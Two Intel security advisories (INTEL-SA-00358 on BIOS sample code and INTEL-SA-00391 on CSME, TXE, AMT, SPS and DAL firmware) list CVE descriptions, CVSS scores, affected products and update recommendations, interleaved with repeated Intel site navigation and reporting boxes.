\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0590: INTEL-SA-00358

Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel BIOS Platform Sample Code Advisory**

**Summary: **

Potential security vulnerabilities in Intel BIOS platform sample code for some Intel® Processors may allow escalation of privilege.  Intel is releasing BIOS platform sample code updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-8764

Description: Improper access control in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8738

Description: Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8740

Description: Out of bounds write in Intel BIOS platform sample code for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:L

CVEID: CVE-2020-8739

Description: Use of potentially dangerous function in Intel BIOS platform sample code for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L

**Affected Products:**

2nd Generation Intel® Xeon® Scalable Processors, Intel® Core™ X-series Processors, Intel® Xeon® Processor W Family and Intel® Xeon® Scalable Processors     

*   CVE-2020-8738
*   CVE-2020-8739
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor D Family, Intel® Xeon® Processor E7 v4 Family and Intel® Xeon® Processor E5 v3 Family, Intel® Xeon® Processor E5 v4 Family

*   CVE-2020-8738
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor D Family               

*   CVE-2020-8739
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor E7 v3 Family

*   CVE2020-8764

Intel® Atom® Processor C3XXX

*   CVE-2020-8738

Intel recommends that users of the affected products update to the latest BIOS firmware provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

Intel would like to thank Dmitry Frolov (CVE-2020-8738) for reporting this issue.

The following issues were found internally by Intel, CVE-2020-8739 and CVE-2020-8764.  Intel would like to thank Brent Holtsclaw for CVE-2020-8740.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-8738: INTEL-SA-00390

Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory**

Intel ID:

INTEL-SA-00391

Advisory Category:

Firmware, Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

CRITICAL

Original release:

11/10/2020

Last revised:

5/12/2022

**Summary: **

Potential security vulnerabilities in Intel® Converged Security and Manageability Engine (CSME), Server Platform Services (SPS), Intel® Trusted Execution Engine (TXE), Intel® Dynamic Application Loader (DAL), Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM) and Intel® Dynamic Application Loader (Intel® DAL) may allow escalation of privilege, denial of service or information disclosure.  Intel is releasing firmware and software updates to mitigate these potential vulnerabilities.

Intel is not releasing updates to mitigate a potential vulnerability and has issued a Product Discontinuation Notice for Intel® DAL SDK.

**Vulnerability Details:**

CVEID: CVE-2020-8752

Description: Out-of-bounds write in IPv6 subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow an unauthenticated user to potentially enable escalation of privileges via network access.

CVSS Base Score: 9.4 Critical

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8753

Description: Out-of-bounds read in DHCP subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

CVEID: CVE-2020-12297

Description: Improper access control in Installer for Intel(R) CSME Driver for Windows versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12304

Description: Improper access control in Installer for Intel(R) DAL SDK before version 2.1 for Windows   may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8745

Description: Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2020-8744

Description: Improper initialization in subsystem for Intel(R) CSME versions before12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel® TXE versions before 4.0.30 Intel(R) SPS versions before E3\_05.01.04.200 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.2 High

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2020-8705

Description: Insecure default initialization of resource in Intel(R) Boot Guard in Intel(R) CSME versions before 11.8.82, 11.12.82, 11.22.82, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 3.1.80 and 4.0.30, Intel(R) SPS versions before E5\_04.01.04.400, E3\_04.01.04.200, SoC-X\_04.00.04.200 and SoC-A\_04.00.04.300  may allow an unauthenticated user to potentially enable escalation of privileges via physical access.

CVSS Base Score: 7.1 High

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8750

Description: Use after free in Kernel Mode Driver for Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2020-12303

Description: Use after free in DAL subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel® TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2020-12354

Description: Incorrect default permissions in Windows(R) installer in Intel(R) AMT SDK versions before 14.0.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2020-8757

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8756

Description: Improper input validation in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8760

Description: Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L

CVE ID: CVE-2020-12355

Description: Authentication bypass by capture-replay in RPMB protocol message authentication subsystem in Intel(R) TXE versions before 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CVEID: CVE-2020-8751

Description: Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, Intel(R) TXE versions before 3.1.80 may allow an unauthenticated user to potentially enable information disclosure via physical access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-8754

Description: Out-of-bounds read in subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2020-8761

Description: Inadequate encryption strength in subsystem for Intel(R) CSME versions before 13.0.40 and 13.30.10 may allow an unauthenticated user to potentially enable information disclosure via physical access.

CVSS Base Score: 4.9 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-8747

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure and/or denial of service via network access.

CVSS Base Score: 4.8 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

CVEID: CVE-2020-8755

Description: Race condition in subsystem for Intel(R) CSME versions before 12.0.70 and 14.0.45, Intel(R) SPS versions before E5\_04.01.04.400 and E3\_05.01.04.200 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 4.6 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE ID: CVE-2020-12356

Description: Out-of-bounds read in subsystem in Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2020-8746

Description: Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2020-8749

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 4.2 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

**Affected Products:**

*   Intel® CSME and Intel® AMT versions before 11.8.82, 11.12.82, 11.22.82, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25.

*   Intel® TXE versions before 3.1.80 and 4.0.30.

*   Intel® Server Platform Services firmware versions before SPS\_E5\_04.01.04.400, SPS\_E3\_05.01.04.200, SPS\_E3\_04.01.04.200, SPS\_SoC-X\_04.00.04.200 and SPS\_SoC-A\_04.00.04.300.  
    

The following CVEs assigned by Intel, correspond to a subset of the CVEs disclosed on 12/18/2020 as part of ICSA-20-353-01:

Disclosed in INTEL-SA-00391

Disclosed in ICSA-20-353-01

CVE-2020-8752

CVE-2020-27337

CVE-2020-8753

CVE-2020-27338

CVE-2020-8754

CVE-2020-27336

Note: Firmware versions of Intel® ME 3.x thru 10.x, Intel® TXE 1.x thru 2.x, and Intel® Server Platform Services 1.x thru 2.X are no longer supported versions. There is no new general release planned for these versions.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® TXE, Intel® AMT and Intel® SPS update to the latest version provided by the system manufacturer that addresses these issues.

The Intel® AMT SDK is available for download here. 

Intel has issued a Product Discontinuation notice for the Intel® DAL SDK and recommends that users of the Intel® DAL SDK uninstall it or discontinue use at their earliest convenience.

**Acknowledgements:**

Intel would like to thank Trammell Hudson (CVE-2020-8705), Marius Gabriel Mihai (CVE-2020-12354, CVE-2020-12304), Oussama Sahnoun (CVE-2020-12297), Rotem Sela and Brian Mastenbrook (CVE-2020-12355) for reporting these issues.

The additional issues were found internally by Intel employees. Intel would like to thank Arie Haenel, Aviya Erenfeld, Binyamin Belaciano, Dmitry Piotrovsky, Julien Lenoir, Niv Israely, Ofek Mostovoy, Yakov Cohen and Yossef Kuszer.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

1.1

12/30/2020

Revisions to CVE-2020-8705 and affected product versions.

1.2

01/22/2021

Added ICSA-20-353-01 reference

1.3

05/12/2022

Updated Acknowledgments 

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#firefox